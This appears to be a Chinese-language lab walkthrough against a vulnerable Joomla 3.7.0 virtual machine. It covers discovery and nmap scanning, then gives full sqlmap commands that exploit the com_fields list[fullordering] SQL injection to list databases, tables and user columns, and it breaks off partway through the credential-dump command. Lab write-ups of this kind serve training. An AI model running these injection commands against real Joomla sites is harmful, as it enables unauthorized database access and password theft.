目录
搭建靶场
靶场下载地址
下载解压文件,并使用虚拟机软件 创建目标
发现目标
netdiscover -r 192.168.226.0/24
发现目标对象 为 :192.168.226.142
信息收集
nmap -sS -sV -A -T4 -p- 192.168.226.142
使用nmap查看目标 开启了那些端口与服务
指纹信息收集
使用Joomscan进行扫描
网站目录收集
漏洞利用
根据信息收集的资料 网站采用Joomls 框架搭建 版本为 3.7.0
搜集相关的漏洞
使用SQLmap 对其进行库名探测
sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
使用sqlmap 获取joomladb库中的表
sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
使用sqlmap获取用户表中的内容
sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' --columns
使用sqlmap获取账号与密码
sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -